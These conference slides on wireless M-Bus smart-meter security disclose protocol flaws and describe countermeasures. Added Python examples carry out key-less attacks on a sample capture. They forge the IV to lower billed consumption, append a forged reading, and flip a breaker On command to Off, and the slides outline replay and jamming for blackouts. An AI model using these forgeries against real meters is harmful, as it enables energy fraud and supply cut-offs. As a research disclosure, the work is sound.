
Energy Fraud and Orchestrated Blackouts
Issues with Wireless Metering Protocols (wM-Bus)
RHUL ISG DL Weekend Conference, Sun Sept 8th 2013, Egham
cyrill.brunschwiler@csnc.ch

Compass Security AG
Werkstrasse 20
P.O. Box 2038
CH-8645 Jona
www.csnc.ch
Tel +41 55 214 41 60
Fax +41 55 214 41 61
team@csnc.ch

Agenda
Intro
Making Of
Smart Grids
Smart Metering

Wireless M-Bus
Identified Issues
Practical Issues

Conclusion


Intro


Intro: Making Of
Thesis on Smart Energy
Summer 2011: Became aware of wireless M-Bus
Autumn 2012: Started MSc thesis
X-mas 2012: German BSI/OMS group published a security report
X-mas 2012: Short mention of M-Bus being inadequate
February 2013: Spent some time digging through the EN paperwork
February 2013: Spent some time in an M-Bus lab environment
March 2013: Finished analysis of the current and draft M-Bus standards
March 2013: German BSI mentions wM-Bus security being insufficient
Summer 2013: Publication at Black Hat USA

Thesis Contents
Introduction
Defensive part (identification of 43 controls for smart meters)
Offensive part (analysis of wireless M-Bus protocol vulnerabilities)

Intro: Smart Grids

(figure: Smart Grid Blueprint)

Intro: Smart Metering

(figure: Metering Infrastructure Blueprint)

Legend
DSO: Distribution System Operator
NAN: Neighbourhood Area Network
Wireless M-Bus

Intro: Smart Metering Collector

Collectors
Various vendors; Neuhaus is just an example of a Multi Utility Controller (MUC)

Supported on the head-end side
GPRS
Ethernet (Web Interface)
WLAN
WiMAX

Supported on the meter side
Wired Serial (RS-485)
Wired M-Bus
ZigBee
Wireless M-Bus

Intro: Smart Metering Collector GUI

(screenshot of the collector web interface)

Intro: Smart Metering Meter

Electricity Meters
Various vendors; Kamstrup is just an example

Interfaces
Optical
Wired Interfaces
GPRS
ZigBee
Wireless M-Bus

Functionality
Meter reading
Pre-payment
Tariffs
Disconnect

Wireless M-Bus


Application
Market segment
Popular in remote meter reading
Heat, Water, Gas, Electricity
15 million wireless devices deployed (figures from 2010)
Mainly spread across Europe

Usage
Remote meter reading
Drive-by meter reading
Meter maintenance and configuration
Becoming popular for smart metering applications
Tariff schemes, real-time-pricing
Demand-response
Pre-payment
Load-limit
Remote disconnect


Protocol Overview


Protocol Overview - Data Link Layer

First Block (Frame Header)
Example Capture (Sent by meter, CRCs removed)
1E 44 2D 2C 07 71 94 15 01 02 7A B3 00 10 85 BF 5C
93 72 04 76 59 50 24 16 93 27 D3 03 58 C8

Field | Value | Interpretation
Length | 1E | 30 bytes frame length (excluding the length byte)
Control | 44 | Indicates a message from the primary station, function send/no reply (SND-NR)
Manuf. ID | 2D 2C | Coded for Kamstrup (KAM), calculated as specified in prEN 13757-3. The ID is managed by the flag association.
Address | 07 71 94 15 01 02 | Identification: 15 94 71 07 (little-endian), Version: 01, Device Type: 02 (electricity meter)

ISSUE #1: Information disclosure

Protocol Overview - Application Layer

Data Header Example
Example Capture (Sent by meter, CRCs removed)
1E 44 2D 2C 07 71 94 15 01 02 7A B3 00 10 85 BF 5C
93 72 04 76 59 50 24 16 93 27 D3 03 58 C8

Field | Value | Interpretation
Access number | B3 | Current access number is 179. The standard mandates choosing a random number at meter start. The standard suggests using timestamps and sequence counters, since ACC alone is insufficient to prevent replay.
Status | 00 | The message is meter initiated and there are no alarms or errors.
Configuration | 10 85 | Encryption mode is 5h, which is AES-128 in CBC mode. 10h indicates a single encrypted block containing meter data (without signature). The field further indicates a short window in which the meter listens for requests (8h).

ISSUE #2: Insufficient replay prevention
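The two header tables above, turned into a decoder. This is an added example, not code from the slides or from the author's scambus sniffer. It handles only the layout the slides show (link-layer header followed by the short data header with CI = 7Ah) and derives the mode 5 IV the way the later IV example does (M-field, A-field, then the access number repeated eight times). The control-field and device-type names are the standard's values; the sample frame is the slide's capture with CRCs already removed.

```python
"""Decode a wM-Bus link-layer header plus short data header (CI = 7Ah).

Added example; not code from the slides or the scambus project.
"""
from dataclasses import dataclass

# Capture shown on the slides (sent by the meter, link-layer CRCs removed).
SAMPLE_FRAME = bytes.fromhex(
    "1E 44 2D 2C 07 71 94 15 01 02 7A B3 00 10 85"
    "BF 5C 93 72 04 76 59 50 24 16 93 27 D3 03 58 C8"
)

CONTROL_NAMES = {0x44: "SND-NR (send / no reply)", 0x46: "SND-IR (installation request)"}
DEVICE_TYPES = {0x02: "electricity", 0x03: "gas", 0x04: "heat", 0x07: "water"}
MODE_NAMES = {
    0: "none", 2: "DES-CBC, zero IV", 3: "DES-CBC, non-zero IV",
    4: "AES-128-CBC, zero IV", 5: "AES-128-CBC, non-zero IV",
}


@dataclass
class ShortHeaderFrame:
    control: str
    manufacturer: str        # three-letter flag-association code, e.g. "KAM"
    identification: str      # 8 BCD digits as printed on the meter
    version: int
    device_type: str
    access_number: int       # ACC
    status: int              # STS
    configuration: int       # raw 16-bit configuration word
    encryption_mode: int
    encrypted_blocks: int
    iv: bytes                # IV a receiver derives for mode 5
    ciphertext: bytes


def decode_manufacturer(m_field: bytes) -> str:
    """M-field: three 5-bit letters (A = 1 ... Z = 26) packed into a little-endian uint16."""
    m = int.from_bytes(m_field, "little")
    return "".join(chr(64 + ((m >> shift) & 0x1F)) for shift in (10, 5, 0))


def parse_frame(frame: bytes) -> ShortHeaderFrame:
    # L-field counts every byte after itself; a mismatch usually means CRCs are still in.
    if frame[0] != len(frame) - 1:
        raise ValueError("L-field does not match frame length (CRCs still present?)")
    if frame[10] != 0x7A:
        raise ValueError(f"CI {frame[10]:02X} not handled; only the short header (7Ah) is")
    m_field, a_field = frame[2:4], frame[4:10]
    acc, sts = frame[11], frame[12]
    cfg = int.from_bytes(frame[13:15], "little")
    return ShortHeaderFrame(
        control=CONTROL_NAMES.get(frame[1], f"unknown ({frame[1]:02X})"),
        manufacturer=decode_manufacturer(m_field),
        identification=a_field[3::-1].hex(),        # BCD identification, stored little-endian
        version=a_field[4],
        device_type=DEVICE_TYPES.get(a_field[5], f"type {a_field[5]:02X}"),
        access_number=acc,
        status=sts,
        configuration=cfg,
        encryption_mode=(cfg >> 8) & 0x1F,          # 5 for the sample frame
        encrypted_blocks=(cfg >> 4) & 0x0F,         # 1 for the sample frame
        iv=m_field + a_field + bytes([acc]) * 8,    # mode 5 IV: M || A || ACC * 8
        ciphertext=frame[15:],                      # one AES block here
    )


if __name__ == "__main__":
    parsed = parse_frame(SAMPLE_FRAME)
    print(parsed)
    print("mode:", MODE_NAMES.get(parsed.encryption_mode, "reserved"))
```

Everything the decoder prints comes from unencrypted bytes: the meter identity, the manufacturer and the access number are readable by anyone within radio range, and the IV is fully determined by them.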

Wireless M-Bus Sniffer

Protocol sniffers display wireless M-Bus data record contents provided you know the key. The standard suggests that at least 8 bytes of the key shall be different for each meter.

(screenshot of the sniffer output)

ISSUE #3: None, short and stupid keys

wM-Bus Protocol Analysis


Encryption Modes
Dedicated Application Layer (DAL) Encryption Modes
0 no encryption
1 reserved
2 DES in CBC mode, zero IV
3 DES in CBC mode, non-zero IV
4 AES-128 in CBC mode, zero IV
5 AES-128 in CBC mode, non-zero IV
6 reserved for future use
7-FF reserved

Extended Link Layer (ELL) Encryption Modes
0 no encryption
1 AES-128 in CTR mode

ISSUE #4: Weak encryption modes

Are we safe with AES?


Are we safe with AES?

Encryption Mode 4 (DAL)
AES-128 in CBC mode
All-zero IV
Uses static key k
C1 = Enc_k(P1 ⊕ IV) = Enc_k(P1 ⊕ 00 00 00 00 ...) = Enc_k(P1)
Equal plaintexts result in the same ciphertext

Standard workaround
The standard mandates prefixing the value with a date and time record
Date and time (record type F) maximum granularity is minutes
Side note: Type I and J records allow for a granularity of seconds

ISSUE #5: Zero consumption detection
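What "equal plaintexts result in the same ciphertext" buys a passive listener, as an added example that is not part of the slides. Assumptions: the block cipher is a stand-in keyed PRF (HMAC-SHA256 truncated to 16 bytes) instead of AES-128, so the block runs without a crypto library; the only property used is that a fixed key maps equal input blocks to equal output blocks, which AES also has. The key, the meter's transmission schedule and the readings are constructed for the demonstration; the record layout (2F filler, a type F date/time record with DIF 04 / VIF 6D, the energy record 04 83 3B from the slides) is the one the workaround prescribes.

```python
"""Zero-consumption detection against DAL mode 4 (AES-128-CBC, all-zero IV).

Added example, not from the slides. The block cipher is a stand-in PRF, see
the lead-in; key, schedule and readings are constructed.
"""
import hashlib
import hmac
from datetime import datetime, timedelta

KEY = bytes(range(16))                                  # constructed demo key
HEADER_MA = bytes.fromhex("2D 2C 07 71 94 15 01 02")   # M and A fields from the slides


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for one AES-128 block encryption (deterministic under a fixed key)."""
    return hmac.new(key, block, hashlib.sha256).digest()[:16]


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Textbook CBC over whole 16-byte blocks: C_i = E_k(P_i xor C_{i-1}), C_0 = IV."""
    out, prev = bytearray(), iv
    for i in range(0, len(plaintext), 16):
        prev = block_encrypt(key, bytes(p ^ c for p, c in zip(plaintext[i:i + 16], prev)))
        out += prev
    return bytes(out)


def type_f(t: datetime) -> bytes:
    """Date/time record type F (EN 13757-3 CP32): minute, hour, day, month, year.
    Seconds are not representable, which is why the workaround only separates
    frames that fall into different minutes."""
    year = t.year - 2000
    return bytes([
        t.minute & 0x3F,
        t.hour & 0x1F,
        (t.day & 0x1F) | ((year & 0x07) << 5),
        (t.month & 0x0F) | ((year >> 3) << 4),
    ])


def meter_frame(t: datetime, energy_wh: int, iv: bytes) -> bytes:
    """One encrypted block: 2F 2F filler, date/time record (DIF 04, VIF 6D),
    energy record (04 83 3B as on the slides), 2F padding."""
    plain = (b"\x2f\x2f" + b"\x04\x6d" + type_f(t)
             + bytes.fromhex("04 83 3B") + energy_wh.to_bytes(4, "little"))
    plain += b"\x2f" * (16 - len(plain))
    return cbc_encrypt(KEY, iv, plain)


def idle_intervals(observations):
    """Passive attacker: identical ciphertext from the same meter means identical
    plaintext, i.e. the reading did not change between the two transmissions."""
    last_seen, idle = {}, []
    for t, ct in observations:
        if ct in last_seen:
            idle.append((last_seen[ct], t))
        last_seen[ct] = t
    return idle


def simulate(zero_iv: bool):
    """Meter transmits every 10 s for two minutes; reading constant, one bump at 50 s."""
    start = datetime(2013, 9, 8, 10, 0, 0)
    observations = []
    for n in range(12):
        t = start + timedelta(seconds=10 * n)
        energy = 341_000 if n < 5 else 341_100
        # mode 4: all-zero IV; mode 5 style: M || A || ACC * 8 with ACC stepping per frame
        iv = bytes(16) if zero_iv else HEADER_MA + bytes([n & 0xFF]) * 8
        observations.append((t, meter_frame(t, energy, iv)))
    return idle_intervals(observations)


if __name__ == "__main__":
    for label, zero in (("mode 4 (zero IV)", True), ("mode 5 (ACC in IV)", False)):
        print(label, "idle intervals detected:", len(simulate(zero)))
```

With the zero IV, every pair of consecutive frames inside the same minute whose reading did not move yields byte-identical ciphertext, so the listener learns when nothing was consumed without ever touching the key; once the access number enters the IV the repeats disappear, at least until ACC wraps.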

Is encryption mode 5 our friend?

Encryption Mode 5 (DAL)
AES-128 in CBC mode
Non-zero IV
Uses static key k
IV built from frame info and data header: M-field, A-field and the access number ACC repeated eight times. ACC is a single byte, so under a static key the IV, and with it the ciphertext of an unchanged plaintext, repeats.

Mode 5, IV Example
Example Capture (Sent by meter, CRCs removed)
1E 44 2D 2C 07 71 94 15 01 02 7A B3 00 10 85 BF 5C
93 72 04 76 59 50 24 16 93 27 D3 03 58 C8
IV = 2D 2C 07 71 94 15 01 02 B3 B3 B3 B3 B3 B3 B3 B3

ISSUE #6: IV repeats => zero consumption detection

How about Counter Mode?

IV in encryption mode 1 (ELL)
CC | Communication control: signals communication direction, prioritises frames
SN | Session number: encryption mode, time field, session counter (4 bits)
FN | Frame number
BC | Block counter

Predictable IVs result in 85-bit security due to TMTO (time-memory trade-off)
How to get the key stream to repeat? Cause the device to reuse the same IV

ISSUE #7: Predictable IV => 85-bit security

Can we adjust the device time?

Encryption in Special Protocols
Alarms and errors
  Signalled within the status byte
  The header is not subject to encryption
Application resets (CI 50h)
  Special upper layer protocol
  Security services of the DAL and ELL do not apply
Clock updates
  Special upper layer protocol
  Set, add and subtract time (TC field)

Issues with message integrity?


Integrity, Authentication Analysis

General
There are two mentions of how one could approach authentication. However, neither authentication methods nor protocols are specified.

DAL Integrity Protection
CRCs
  There are CRCs at the frame level
  CRCs are not considered integrity protection
Signatures
  Encryption modes 5 and 6 can signal digitally signed billing data
  Not widely used, since the meter display has priority
MACs
  Not available

Manipulation of Ciphertexts or IVs
In CBC mode, manipulating the ciphertext is pointless (the manipulated block decrypts to garbage)
Manipulation of the IV is difficult but feasible

ISSUE #9: Inexistent integrity and authentication

IV Manipulation Example
Example of Consumption Value Manipulation
P1' = Dec_k(C1) ⊕ IV'  =>  Dec_k(C1) = P1' ⊕ IV' = P1 ⊕ IV
P1' = P1 ⊕ IV ⊕ IV'

Precondition
Original value read from the meter display: 341 kWh (08 34 05 00)

Calculate Plaintext P1'
P1  = 2F 2F 04 83 3B 08 34 05 00 2F 2F 2F 2F 2F 2F 2F
IV  = 2D 2C 07 71 94 15 01 02 B3 B3 B3 B3 B3 B3 B3 B3
IV' = 2D 2C 07 71 94 15 01 05 B3 B3 B3 B3 B3 B3 B3 B3
P1' = 2F 2F 04 83 3B 08 34 02 00 2F 2F 2F 2F 2F 2F 2F

Result
P1' decodes to 144'392 Wh (08 34 02 00)

ISSUE #10: Alteration of consumption values

Partial Encryption in wM-Bus

Partial Encryption
The Dedicated Application Layer allows for partial encryption
How does the receiver handle doubled data records?

Expansion Attack Example
Value in CT: 04 83 3B 08 34 05 00 (341'000 Wh)
1E 44 2D 2C 07 71 94 15 01 02 7A B3 00 10 85 BF 5C
93 72 04 76 59 50 24 16 93 27 D3 03 58 C8

Value attached: 04 83 3B 08 34 02 00 (144'392 Wh)
25 44 2D 2C 07 71 94 15 01 02 7A B3 00 10 85 BF 5C
93 72 04 76 59 50 24 16 93 27 D3 03 58 C8 04 83 3B
08 34 02 00

ISSUE #11: Consumption value pollution
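The two forgeries from the IV manipulation slide and the expansion slide, carried out on the slide's own capture. This is an added example, not code from the slides or the scambus project. The precondition is the slide's: the attacker has read the current value (341 kWh) off the meter display. The IV forgery is written generally rather than for the single byte the slide flips: any of the first eight IV bytes (M and A fields) can be chosen freely, whereas IV bytes 8..15 are one ACC byte repeated, so a change that would need different values there is not expressible in the header and the function refuses it. Link-layer CRCs are stripped on the slides and are not recomputed here.

```python
"""Key-less forgery of a consumption value in a DAL mode 5 (AES-128-CBC) frame.

Added example; not code from the slides or the scambus project. Both tricks
work because nothing authenticates the frame: the IV is built from clear
header bytes, and partial encryption lets a clear record be appended.
"""

SAMPLE_FRAME = bytes.fromhex(
    "1E 44 2D 2C 07 71 94 15 01 02 7A B3 00 10 85"
    "BF 5C 93 72 04 76 59 50 24 16 93 27 D3 03 58 C8"
)
DISPLAY_WH = 341_000                       # read from the meter display (slide precondition)
RECORD_HEAD = bytes.fromhex("04 83 3B")    # DIF/VIF of the energy record on the slides


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def mode5_iv(frame: bytes) -> bytes:
    """IV = M-field (2) || A-field (6) || ACC repeated 8 times, all from the clear header."""
    return frame[2:10] + bytes([frame[11]]) * 8


def energy_record(wh: int) -> bytes:
    return RECORD_HEAD + wh.to_bytes(4, "little")


def first_block(wh: int) -> bytes:
    """First plaintext block as on the slide: 2F 2F filler, the record, 2F padding."""
    body = b"\x2f\x2f" + energy_record(wh)
    return body + b"\x2f" * (16 - len(body))


def read_energy(block: bytes) -> int:
    i = block.index(RECORD_HEAD) + len(RECORD_HEAD)
    return int.from_bytes(block[i:i + 4], "little")


def forge_iv(frame: bytes, known_p1: bytes, wanted_p1: bytes) -> bytes:
    """Patch the header so the collector's IV' makes Dec_k(C1) xor IV' == wanted_p1.

    P1' = P1 xor IV xor IV', hence IV' = IV xor (P1 xor P1'). IV bytes 0..7 come
    from the M and A fields and are free; bytes 8..15 all equal ACC, so the
    change must be identical there or it cannot be expressed in the header.
    """
    delta = xor(known_p1, wanted_p1)
    iv_new = xor(mode5_iv(frame), delta)
    if len(set(iv_new[8:])) != 1:
        raise ValueError("not expressible: IV bytes 8..15 must all equal the single ACC byte")
    patched = bytearray(frame)
    patched[2:10] = iv_new[:8]
    patched[11] = iv_new[8]
    return bytes(patched)


def collector_first_block(original_p1: bytes, original: bytes, patched: bytes) -> bytes:
    """What the collector decrypts: Dec_k(C1) is unchanged, only its IV differs."""
    return xor(original_p1, xor(mode5_iv(original), mode5_iv(patched)))


def expand(frame: bytes, wh: int) -> bytes:
    """Partial encryption: append an unencrypted record after the encrypted block
    and fix the L-field. Which of the two energy records the collector trusts is up to it."""
    out = bytearray(frame) + energy_record(wh)
    out[0] = len(out) - 1
    return bytes(out)


if __name__ == "__main__":
    p1 = first_block(DISPLAY_WH)
    patched = forge_iv(SAMPLE_FRAME, p1, first_block(144_392))
    print("patched header:", patched[:15].hex(" ").upper())
    print("collector reads:", read_energy(collector_first_block(p1, SAMPLE_FRAME, patched)), "Wh")
    print("expanded frame :", expand(SAMPLE_FRAME, 144_392).hex(" ").upper())
```

For the slide's target (341'000 Wh to 144'392 Wh) only byte 7 of the IV changes, which is the device-type byte of the address; the collector then derives IV' from the forged header and dutifully decrypts the lower value.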

Integrity Analysis
ELL Manipulation Example
C  = E7 8E 1B 7B 9D 86 (Intercepted Ciphertext)
P  = CC 22 01 FD 1F 01 (On Command)
P' = F1 47 01 FD 1F 00 (Off Command)
C' = C ⊕ P ⊕ P'
   = E7 8E 1B 7B 9D 86 ⊕ CC 22 01 FD 1F 01 ⊕ F1 47 01 FD 1F 00
C' = DA EB 1B 7B 9D 87 (Manipulated Ciphertext)

ISSUE #12: Bit flipping
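The bit-flip above and the key-stream reuse raised on the counter mode slide ("cause the device to reuse the same IV"), as an added example that is not part of the slides. The six-byte ciphertext and the On/Off plaintexts are the slide's values; the key stream is never known to the attacker up front but falls out of C ⊕ P once one plaintext is known. The IV-reuse monitor at the end is an added receiver-side check, not something the standard specifies; it assumes the receiver can see the IV fields (SN, FN) and the sender address of every frame.

```python
"""Malleability of the ELL counter mode (mode 1) without the key.

Added example; not from the slides or the scambus project. Values for C, P
and P' are the slide's; the receiver-side monitor is an added check.
"""


def xor(a: bytes, b: bytes) -> bytes:
    if len(a) != len(b):
        raise ValueError("length mismatch")
    return bytes(x ^ y for x, y in zip(a, b))


C_ON = bytes.fromhex("E7 8E 1B 7B 9D 86")   # intercepted ciphertext of the On command
P_ON = bytes.fromhex("CC 22 01 FD 1F 01")   # known plaintext (On)
P_OFF = bytes.fromhex("F1 47 01 FD 1F 00")  # plaintext the attacker wants delivered (Off)


def flip_to(ciphertext: bytes, known_plaintext: bytes, wanted_plaintext: bytes) -> bytes:
    """Stream-cipher malleability: C' = C xor P xor P'; the receiver decrypts C' to P'.
    Without a MAC the change is undetectable."""
    return xor(ciphertext, xor(known_plaintext, wanted_plaintext))


def keystream_from_known(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """One known plaintext reveals the key stream that the IV produced."""
    return xor(ciphertext, known_plaintext)


def decrypt_with_reused_iv(ciphertext: bytes, keystream: bytes) -> bytes:
    """Any other frame the device encrypts under the same IV (same SN, FN, BC)
    is protected by the same key stream and decrypts with it."""
    return xor(ciphertext, keystream)


class IvReuseMonitor:
    """Receiver-side check (added here): refuse a frame whose IV has already
    been seen from the same address. Turning the clock back via an unprotected
    clock update is one way to make a meter repeat an IV."""

    def __init__(self):
        self.seen = set()

    def accept(self, address: bytes, iv: bytes) -> bool:
        key = (address, iv)
        if key in self.seen:
            return False
        self.seen.add(key)
        return True


if __name__ == "__main__":
    forged = flip_to(C_ON, P_ON, P_OFF)
    ks = keystream_from_known(C_ON, P_ON)
    print("forged Off frame :", forged.hex(" ").upper())
    print("key stream       :", ks.hex(" ").upper())
    print("decrypts back to :", decrypt_with_reused_iv(forged, ks).hex(" ").upper())
```

Note that the frame the attacker forges and the frame the meter itself would send for "Off" under the same IV are byte-identical, which is exactly why the collector cannot tell them apart.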

Which messages are affected?

Integrity with Special Protocols
No integrity protection at all for:
Alarms and errors
Application resets
Clock synchronization
Commands
Network management
Precision timing

ISSUE #13: Sniffing, wrong commands, manipulation

Practical Issues


Issues with Packet Replay

Shield and Replay I
Capture messages from the original device
Shield the device and replay the messages

Issues with Packet Replay

Shield and Replay II
Shield the device and keep a receiver with it
Submit the messages to the collector, possibly at a lower pace

Issues with Packet Replay

Jam and Replay
(figure: Meter -> Sender Device -> Collector)

Orchestrated Blackouts
Prepare attack
Drop devices
War drive
Set up sender
Bring a flashlight!

Conclusion


Conclusion
A picture is worth a thousand words (figure)

Conclusion
General Issues
Key size 64 bits (DES modes)
Zero consumption detection
Disclosure of consumption values
Plaintext errors and alarms
Information disclosure
Man-in-the-middle in routed environments
Key disclosure

Energy Fraud
Manipulation of consumption values

Orchestrated Blackouts
Manipulation of valve and breaker open/close commands

Outlook
Counter Measures
Efforts of the OMS Group and the German Federal Office for Information Security (BSI):
Integrity-preserving authentication and fragmentation layer (AFL)
Additional encryption mode relying on AES-128 in CBC mode using ephemeral keys
TLS 1.2 support for wM-Bus
Published at X-mas 2012
Looks promising; no independent public analysis so far

Battery pack empty.


Presentation
http://www.csnc.ch/misc/files/2013/energy_fraud_and_blackouts.pdf
Whitepaper
http://www.csnc.ch/misc/files/2013/wmbus_security_whitepaper.pdf
Sniffer & MUC (credits lukas@statuscode.ch)
https://github.com/CBrunsch/WMBus-Sniffer-MUC
Python Sniffer Scambus
https://github.com/CBrunsch/scambus
GNU Radio wM-Bus (credits neundorf@kde.org)
https://github.com/oWCTejLVlFyNztcBnOoh/gr-wmbus
Cliparts
http://openclipart.org